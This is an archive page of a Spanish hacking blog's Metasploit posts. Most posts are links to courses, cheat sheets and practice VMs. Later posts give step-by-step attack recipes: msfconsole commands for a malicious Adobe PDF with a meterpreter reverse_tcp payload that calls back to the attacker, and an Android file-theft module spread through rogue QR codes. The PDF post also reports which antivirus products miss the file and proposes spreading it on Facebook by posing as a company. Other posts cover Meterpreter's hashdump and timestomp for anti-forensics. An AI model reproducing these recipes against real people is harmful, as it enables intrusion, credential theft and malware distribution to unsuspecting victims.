Este blog ya no está activo, sigue informándote aquí:

Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas
Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas

miércoles, 7 de junio de 2017

Metasploit.- Paso a paso.

Hace mucho que no toco Metasploit, miento el otro día lo abrí para ver si estaba el mítico exploit de samba pero no mucho mas, pero con la que está cayendo últimamente no solo tendría que empezar a refrescar Ruby si no también Metasploit. 


Por eso y ya que voy a refrescarlo esta tarde, os dejo con la guía Step by step Metasploit del blog zero-day.io donde no solo hacen una repaso al famoso framework si no que ademas te explican la fase de reconocimiento con un par de herramientas famosas también y se para a explicar por que debemos utilizar Rhost cuando estamos lanzando un exploit desde fuera de nuestra red y Lhost cuando la maquina victima esta dentro. Muy recomendable. 

Enlace a la guía: 
Sed Buenos ;) 

martes, 24 de enero de 2017

Video.- No querias Ruby pues toma tres tazas

Aún no me he puesto a aprender tanto Ruby como me había propuesto el año anterior pero ya sabéis que me encanta las aplicaciones que tiene este lenguaje de programación por lo que respecta a Metasploit. Así que, hoy os voy a recomendar este "mini-curso" de Metasploit muy orientado al uso de Ruby. 


Muy interesante, yo me propongo en este 2017 ir mejorando mi Ruby día a día y voy a ir siguiendo muy de cerca estos vídeos, me han encantado.

Sed Buenos ;) 

miércoles, 16 de noviembre de 2016

Nueva versión de Metasploitable

Ya sabéis que Metasploitable es esa distribución creada para que todos los que nos gusta este mundo podamos practicar tecnificas que nos permitan vulnerar una máquina. La verdad es que aun sigo dándole caña a las versiones anteriores cuando me aburro y quiero estrujarme la cabeza un rato. 


Requisisitos de la distribución:
  • Packer
  • Vagrant
  • Vagrant Reload Plugin
  • VirtualBox
  • VMware (pronto)
Mucha mas información: 


Enlace a la distro: 
No os digo yo que ya que estamos haciendo pruebas con el canal de Youtube no convenza a mi hermano para hacer algún vídeo trasteando con esta distribución. 

Sed Buenos y jugad mucho con esto ;) 

viernes, 11 de noviembre de 2016

[Paper].- Metasploit a bajo nivel.

Hoy es viernes, por si no habíais sospechado algo ya y se que no estamos con ganas de profundizar mucho en ciertas cosas.  Pero, Metasploit siempre mola y este Paper firmado por [Saad Talaat] es bastante curioso. 


La verdad es que después de un rápido paseo sobre los tipos de malware digno del CEH empieza a explicar muy bien el modulo Encoder y los tipos de codificadores que utiliza. Tiene ejemplos y todo, es muy interesante.
Sed buenos ;) 

viernes, 6 de mayo de 2016

Slides.- Meterpreter Cheat Sheet

Es viernes y hoy tenemos tiempo para jugar con Metasploit y Meterpreter, su payload por excelencia.  Así que os dejo el enlace a dos slides con chuletas sobre comandos de Meterpreter que unidas al [Cheat Sheet de Metaploit] que os recomendé hace mucho tiempo, lo tenemos todo para pasar una tarde entretenida.


Enlace a las slides:
Sed Buenos y imprimiros esto que es miel pura ;) 

lunes, 20 de julio de 2015

Metasploit.- Cheat Sheet

Ahora que muchos estáis de vacaciones o estáis apunto de pillarlas es hora de darle caña a todo lo aprendido durante el "curso", montarnos un metasploitable y darle fuerte y duro hasta que aprendamos a usar metasploit de forma rutinaria (bueno, al menos esto quiero hacer yo este verano xD). Para esto y para que yo me acuerde en un futuro voy a recomendaros el Cheat Sheet de metasploit hecho por SANS Institute. 


Espero que le deis muy fuerte a mestasploit. 

Sed Buenos ;) 

sábado, 28 de marzo de 2015

Nueva Capsula de Metasploit Desde 0 Y Grupo de Telegram.

Hace días que os hable de la iniciativa de Snifer@l4b's referente a la producción de capsulas de información sobre seguridad informática en formato vídeo de entre 10 y 15 minutos y os hable de la buena idea que me parecida. Ahora, después de una semana mas o menos,  ya he podido disfrutar de la segunda capsula dedicada a Metaspliot y espero con ganas la de Nmap. La verdad es que me está gustando mucho este proyecto y espero poder colaborar en el lo antes posible. 


Aquí os dejo la nueva capsula de Metasploit desde 0 creada por el amigo Jsitech:


También, como punto para que estas capsulas sigan un sistema de mejora continua se ha abierto un grupo en el servicio de mensajeria Telegram para todo aquel que este interesado en recibir, dar, intercambiar información y/o proponer mejoras para los videos. 

Para unirse puedes enviar un mensaje por Telegram los siguientes siguientes usuarios, ellos te agregaran con gusto:

@SniferL4bs
@Jsitech

Espero que esta idea se haga cada vez mas grande y que no pare ahora que quiero participar. 

Sed Buenos y aprended mucho ;) 

lunes, 23 de marzo de 2015

Capsulas de Seguridad Informática. - Snifer@L4b's

Como algunos ya sabréis Snifer el fundador del blog [Snifer@L4b's] y amigo de este blog ha decidido hacer capsulas de seguridad, vídeos de entre 10 y 15 minutos, explicando Nmap desde 0. A mi me encanto el primer vídeo, así que al no ver ninguna publicación suya fui a pedírselo. 



Así que después de hablar con el Dino, me entere de que [Jason Soto] alias [@Jsitech] también estaba realizando una capsula para el blog pero, esta vez enfocada a aprender a usar Metasploit desde cero.

De esta manera y ya que me gusta mucho la iniciativa os voy a recomendar sus vídeos que, aunque están en usa fase temprana, estoy seguro de que os gustarán a mas de uno. 

Nmap desde 0:



Metasploit desde 0:


Más información:

Sed Buenos con esto y aprended mucho. ^^ 

jueves, 11 de diciembre de 2014

Elevación de Privilegios en Windows 7 usando NTUserMessageCall

Hoy, como ya es algo habitual en mi día a día, he estado curioseando blogs y he encontrado una elevación de privilegios en Windows 7 usando la vulnerabilidad NTUserMessageCall.


Por la información que he podido encontrar sobre esta vulnerabilidad se trata de un desbordamiento en la  pool del kernel en Win32k permitiendo así una elevación de privilegios en local. Ademas, sabiendo que NTUser.dat es un archivo de registro de Windows. 

Bueno, en realidad es mas parecido a una base de datos que contiene la configuración de registro de su cuenta individual de un usuario del sistema. Así que el párrafo anterior tiene su lógica. 

Explicado todo esto, os dejo con un vídeo donde podéis ver la ejecución del exploit de esta vulnerabilidad. 

viernes, 26 de septiembre de 2014

Slide.- Vulnerablidad Bash, Ataques en Ipv4 e Ipv6 e Introducción a Metasploit.

Hoy os traigo tres slides mas en la s que estuve trabajando ayer para la formación de esta tarde. Para esta sesión faltaban bastantes cosas por comentar debido a la cantidad de practicas que no he podido hacer por culpa de los equipos de los que dispone mi aula.

Hoy he querido llevar la vulnerabilidad bash que salió ayer para que la vieran y explicarla un poco. pero como tampoco tenia ninguna distribución UNIX he eludido la practica pero he hecho la Slide un poco mas divertida. 


Luego, como ya había cargado el metasploit después he querido explicarles el funcionamiento de metasploit y un poco de historia que nunca viene mal. 


Para acabar les he dado un poco de caña con algunos ataques en Ipv4 e Ipv6 por que me parecia una tontería hablar de Arp Spoofing sin entrar en Ipv6. 


Espero que os gusten o os hayan gustado. 

Sed Buenos ;) 

sábado, 23 de agosto de 2014

Volcado de Memoria Ram desde Meterpreter.

Como muchos os habréis supuesto o habéis tenido la oportunidad de trastear con esto, un volcado de la Memoria RAM nos puede dar sorpresas bastante buenas. Claro el problema radica en que tener acceso fisco al ordenador de la victima es difícil pero gracias a Meterpreter, el Superfamoso Payload para Metasploit y al script process_memdump.

Opciones de process_memdump:
  • -h --> Ayuda. (todo un clasico xD)
  • -n <opt> --> nombre del processo que quieres "dumperar" o volcar. 
  • -p <opt> --> PID (Process Identificator) del proceso que queremos volcar. 
  • -q  --> Búsqueda del tamaño del proceso que queremos volcar. En bytes. 
  • - r  <opt> --> Automatizar el volcado con un archivo de texto con la lista de nombres de los procesos para volcar, uno por línea.
  • -t -->  Añadir la localización en la información del volcado. 
La verdad es que me ha sorprendido gratamente encontrarme con este Script ya que, si tienes que hacer un forense de forma remota esto nos puede facilitar muchísimo la vida.

Espero que os haya gustado y Sed Buenos ;)  

domingo, 17 de agosto de 2014

Meterpreter Para Usos Forenses y AntiForenses

Esta es la entrada que ayer no pude subir y la verdad es que estos días están haciendo que me lea los papers y libros que tenia atrasados.  No hay mal que por bien no venga. Hoy voy ha hablaros del famosisimo meterpreter. Ya todos conoceréis a este payload de Metasploit, pero lo que yo no sabia era que nos podía ayudar hasta en peritajes forenses.

Gracias a su modulo priv. podremos conseguir una elevación de privilegios y hasta sacar información del archivo SAM de Windows (SAM =  Security Account Manager) Ademas, este modulo se divide en tres caregorias: 

Priv: Elevate Commands: 
  • Al vulnerar un sistema podremos hacer una elevación de privilegio con el comando getsystem 

Priv: Password Database Commands: 
  • Nos permite recoger información sobre contraseñas y usuarios. (con el comando hashdump lograremos un volcado del archivo SAM)

Priv: Timestomp Commands: 
  • Permite manipular los atributos de un archivo. Esto es util para hacer un antiforense y marear un poco al perito. Con el comando timestomp podremos hacerlo. 

Sed Buenos con esto ;) 

domingo, 13 de abril de 2014

Canal Pirata de Snifer IX - Domando a Metasploit aprendiendo del monstruo

Esta vez andamos de buen humor! debido a que las cosas van mejorando de apoco lento pero seguro, tanto como la salud como en el trabajo y demas detalles, pero eso se vera luego ademas de todo ello con ALBERT andamos con un proyecto encima que estoy seguro que les agradara! algo que ver con la amiga la Foca los que sepan algo a buscar!!  lanzaremos algun concurso o algo :D.

Pero bahhh ahora como andamos de buenas venimos con este pack de Metasploit una coleccion de libros para ser los maestros ZEN pero diremos casi, porque es un monstruo!

Tararararaarara! a leer  mas.....





DESCARGA

Regards,
Snifer

domingo, 22 de diciembre de 2013

Metasploitable.- Arrasa Con Lo Que Veas, Y Generoso No Seas.

Muchas veces cuando descubrimos un nuevo framework de explotación, como por ejemplo metasploit, queremos probarlo y nos volvemos locos para encontrar una forma legal de poder hacer sangre o practicar con estas herramientas de seguridad. El equipo de Metasploit lo sabe y por eso hace tiempo que han lanzado una maquina virtual Linux para estos "experimentos". Así que, arrasa con lo que veas, y generoso no seas


"El nombre de usuario y contraseña por defecto es msfadmin:. msfadmin Nunca exponga el VM a una red insegura (uso de NAT o Host modo sólo si usted tiene cualquier pregunta lo que eso significa). Una vez que haya descargado la VM, extraiga el archivo zip, abrir el archivo vmx usar su producto VMware de elección, y encenderlo. Después de un breve tiempo, el sistema será arrancado y listo para la acción."

Os dejo el link de la descarga y mas información sobre esta maquina virtual por aquí abajo, ojo que hay spoilers. 

Sed buenos con esto y aprended mucho mas ;)

viernes, 27 de septiembre de 2013

Metasploit.- Curso Completo En Video <-- DragonJar

Hace mucho os hable de [BackTrack Academy] donde os hablaba de un seguido de vídeo-tutoriales bastante buenos sobre Hacking en general. Aunque, la verdad es que al acabar esos videos me quedé con ganas de mas así que me encantado encontrar en el famoso blog de [DragonJar] un curso la mar de completo de Metasploit. 


Aunque están en Ingles, cada una de esas clases son una maravilla, os dejo la dirección abajo y espero , como siempre que lo disfrutéis.

Siento si la entrada es mas corta de lo habitual pero a buen entendedor pocas palabras bastan y no se que mas deciros para que, todos a los que os gusta este tema, os pongáis de inmediato a curiosear todos los videos. 

Sed Buenos ;) 

sábado, 18 de mayo de 2013

Bugtraq 2 Black Window.- Agregando Módulos A Metasploit

Hace unos ya un tiempo dije que me pondría en serio con la nueva distribución del [Bugtraq Team] y a colación del [0'day de Internet Explorer] del que hablamos hace unos días, es aconsejable que refresquemos un poco la memoria en todos los aspectos. 


Como bien una vez instalas metasploit o cualquier distribución actualizada, viene con unos cuantos exploit con los que poder juguetear un rato y si quieres mas solo has de hacer un msfupdate para que metasploit se actualice. Ojo con esto, las distribuciones antiguas dan algunos problemas a la hora de actualizarse así que es mejor desinstalartlo y meter la versión mas actualizada del framework.  ¿Pero que pasa si quiero solo un modulo en especial, que salió hace dos días y no se puede obtener por msfupdate?

Primero de todo buscaremos el modulo que nos interesa en la pagina oficial de metasploit que en el caso del 0'day que os he dicho es el CVE-2013-1347 (este numero salia en el articulo de hace unos días). 


Después de encontrarlo y asombrarnos con el maravilloso código Ruby. Lo descargamos en la maquina donde este instalado nuestro framework (el metasploit). 






Ahora solo nos queda buscar la carpeta donde la distribución tiene alojado a metasploit y copiar este modulo justamente donde tiene que ir. que en el caso de bugtraq 2 Black Window irá en /opt/metasploit-4.4.0/msf3/modules/exploits/windows/browser/ si lo intentamos copiar a "pelo" (arrastrado sin mas) no nos dejará hacerlo debido a que no estamos autenticados como root. No hay problema, hemos querido solucionar esto de una tacada así que le hemos dado caña a la consola y lo hemos copiado a mano. 



Y llegados a este punto solo tenemos que comprobar si metasploit lo reconoce como un nuevo modulo. Así que, daremos buen uso al msfconsole y al comando search para saber si realmente ya lo tenemos disponible o hemos hecho algo mal. 



Y aquí lo tenis nuestro nuevo modulo de exploit listo para ser usado y todas las opciones que nos ofrece para poder configurarlo a nuestro gusto. (Os debo otra entra para enseñaros como utilizarlo, pero ahora ya podéis ir haciendo vuestros experimentos. ^^ ) 
____________________________________________________________
Las Gracias A Quienes Se Las Merecen:
  • http://www.flu-project.com/ <-- por enseñar como explotar este 0'day en metasploit 
  • A mi hermano por tener siempre a mano esas distribuciones que me hacen tanta falta y por hecharme un cable cuando el mi backtrack se hizo pedazos y no llegaba ha hacer esta entrada. 
---------------------------------------------------------------------------------

sábado, 23 de marzo de 2013

Metasploit Y Ruby

Hace tiempo que me quería poner a aprender a programar en algún lenguaje que me gustara y empece con cosillas como Html acompañado de Css y JQuery la verdad es que me entretení mucho haciendo mis experimentos y algún proyecto, que no puedo desvelar aun, ronda por mi cabeza. Pero bueno ya es hora de aprender un lenguaje mas y esta vez he optado por Ruby el Yukihiro Matsumoto bastante parecido a Perl o Phython.


¿Porque me ha dado ahora para empezar a programar en Ruby? Muy simple, Ruby es el leguaje de programación que utiliza el FrameWork de Metasploit así podre crearme mis propios módulos de exploit y sere feliz xD. Para mas información os dejo una ponencia en vídeo donde seguramente explicaran mejor que le funcionamiento de Metasploit.


martes, 27 de noviembre de 2012

Ataque a Móviles Android Utilizando Codigos "Evil" QR

Cada vez es mas fácil toparte con estos códigos allá donde vayas y aunque su funcionamiento parece fácil podemos saber poco o casi nada del sitio donde nos mandan una vez escaneado el código con nuestro móvil   Hoy he hecho el experimento y la verdad es que el resultado a sido bastante placentero.

Si alguien tiene curiosidad de donde lleva la URL de este código
es el de la portada de la Wikipedia en Español  

 El proceso no tenia que ser difícil, solo tendríamos que decirle a metasploit que se ponga a escuchar por una IP y un puerto concreto en la maquina del atacante y crear un QR en forma de etiqueta. 

Para todo esto utilizaremos un modulo de metasploit llamado auxiliary, el cual nos proporciona de herramientas externas para el programa como por ejemplo: escaneres, herramientas de denegación de servicios, sniffers, etc. Mas concretamente usaremos el siguiente exploit:  [use gather/android_htmlfileprovider El cual tiene un rango medio y nos permita el "robo" de archivos de forma remota. 

Ingredientes: 
    • Distribución Linux:  Backtrack 5 - R3 ( R1 y R2 también sirven pero ya que estáis bajaros la ultima versión desde la pagina oficial que es gratis. ) http://www.backtrack-linux.org/
    • Tener instalado el Metasploit Frameworks (Si os habeis bajado la ultima versión viene de serie con el S.O)
    • Terminal Android.

Código:
    • msfconsole <-- con este comando abrimos a Metasploit 
    • use gather/android_htmlfileprovider <-- selecionamos el exploit que os he explicado antes
    • set FILES system/etc/host <-- en este comando le decimos que archivo queremos extraer de la victima, yo he elegido host porque es la ruta mas clara que tengo. 
    • set URIPATH / <-- hay un espacio enre Uripath y la [/] este comando sirve para crear un Identidicador de Recursos Uniforme de forma aleatoria. URI es una cadena caracteres la cual se utiliza para identificar un nombre o un recurso. 
    • set SRVPORT 8080 <-- Seleccionamos el puerto por el cual nos pondremos a la escucha. 
    • run <-- ejecutamos el exploit 


Ahora nos abrimos una cuenta en DynDNS (es un sistema que nos ofrece la posibilidad de poder tener nuestro servidor con una dirección como stateX.dyndns.com), aunque antes era gratuito ahora es de pago pero te dejan probarlo durante 14 días.  

La configuración es muy simple, solo se trata de rellenar el cuestionario y de poner todos los datos. Ojo pide datos de tarjeta de crédito pero como yo tenia alguna en la que solo había 1€ pues la he metido y pienso borrar el pedido antes de esos 14 días para que no me cobren ninguna tasa rara. 

Y nada, con nuestro dominio y con nuestros puertos debidamente abiertos. Vamos a cualquier pagina de generación de Codigos QR (yo he hecho la prueba con http://qrcode.kaywa.com/) y a distribuir códigos por los sitios en los que tu ingeniería social  pueda encontrar. 


jueves, 22 de noviembre de 2012

Pdf Y Metasploit (Parte 1) .- Creación Y Difusión.

Hace ya un tiempo que el ataque con PDF maliciosos esta dando muy buenos resultados. Un PDF de ese tipos tarda mas de 5 minutos en crearse y buscando un medio de difusión correcto puede causar estragos a aquellos que no actualicen su software adecuadamente.


Adobe esta tomando todas las medidas que puede pero no son suficientes. Ya dedique [una tira] respecto a lo que pensaba de la cantidad de ataques que esta recibiendo esta compañía, pero me rondaba la curiosidad y las ganas de poder hacer un PDF malicioso y analizarlo un poco.  Así que me he puesto a ello.

El proceso es fácil, rápido y solo necesitamos los siguientes Ingredientes: 
    • Distribución Linux:  Backtrack 5 - R3 ( R1 y R2 también sirven pero ya que estáis bajaros la ultima versión desde la pagina oficial que es gratis. ) http://www.backtrack-linux.org/
    • Tener instalado el Metasploit Frameworks (Si os habeis bajado la ultima versión viene de serie con el S.O)
    • Un Windows entre XP-7 el cual explotar (os sugiero que lo proveéis en una maquina virtual) 
    • Dicho Windows ha de tener una versión de Adobe Reader 9.1 o menor. 
Aunque en esta primera parte solo nos centraremos en la creación y la difusión de este PDF mas vale que tengáis preparada el Windows 7 para mas adelante. 

Para esta investigación nos basaremos en [Adobe PDF Escape EXE Socila Engineeringdado que tiene un rango excelente y actúa en una versión de Adobe no muy vieja. Empecemos a darle caña.
  • Una vez en Backtrack abrimos la terminal y escribimos: msfconsole esta operación suele tardar unos minutos. 
  •  Cuando acabe de cargar pondremos el siguiente codigo: 
Use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs <-- (seleccionamos el exploit que vamos a usar, el que previamente habremos buscado en la web o en nuestro repositorio y se adecue a nuestras necesidades)
 Set payload windows/meterpreter/reverse_tcp <-- (definimos el [payload] que devolverá el [meterpreter])
Set filename XXXX_XXX.pdf <-- (creamos el archivo pdf con el nombre que queramos)
Set lhost 192.168.1.23 <-- (definimos la IP del atacante por la cual nos pondremos a la escucha en el momento que la victima abra el pdf)
Set lport 8080 <-- (definimos el puerto del atacante, también sera importante para escuchar mas adelante) 
Ya tenemos en nuestro poder el Pdf Malicioso dispuesto a ser distribuido. Tened en cuenta que se guarda en una ruta especial del root/.msf4/local , si no lográis ver la carpeta apretad CONTROL + H  para desocultarlas.

Ahora solo nos queda distribuirlo por donde los antivirus nos dejen. He hecho la prueba con [Virus Total] una Web donde puedes puedes comprobar si un archivo está libre de virus y de la que ya os hablamos aquí en los comienzos de este blog (es la segunda entrad xD). El resultado no ha podido sorprenderme mas, mi pdf se llama Cambios_En_La_Web.

O.O se lo comen 20 antivirus del mercado. 

Por lo que alguna presa grande del sector debe haber caído no? En efecto.

O.O Kaspersky me has fallado. Pero tranquilos que Avast, AVG y Windows Defender si que los caza..

Lo primero que se nos viene a la cabeza a la hora de distribuirlo es a empaquetarlo en un email y tirar de dotes de Ingeniero social para que la victima acabe descargándose el archivo. No va a ser tan fácil ahora mismo la mayoría de sistemas de correo electrónico escanean los archivos que subes, este truco hace tiempo que se conocen así que ya han tomado medidas para ello. Un ejemplo claro son Hotmail con el Trend Micro Pc Cillin o Gmail con su Sophos (aunque solo es un rumor). 

No me esperaba menos de Gmail .

¿He dicho que no podía ser tan fácil? Perdón me he equivocado xDD

0.0 ¿tendría que haber avisado a facebook de esto? 

En efecto en Facebook no hay antivirus así que favorece el crecimiento de estos ataques. Solo has de hacerte pasar por una empresa X que ofrece Y gratis y te entrega un catalogo para que te lo mires guiño guiño. Facil, comodo y en un canal con millones de personas. 

Ahora el problema sera burlar al antivirus que tenga la victima instalado en su equipo y aprenderemos a analizarlos para estar seguros. Pero eso lo dejaremos para otra entrada. 

_______________________________________________________________________________
Las Gracias A Quienes Se Las Merecen:
----------------------------------------------------------------------------------------------------------.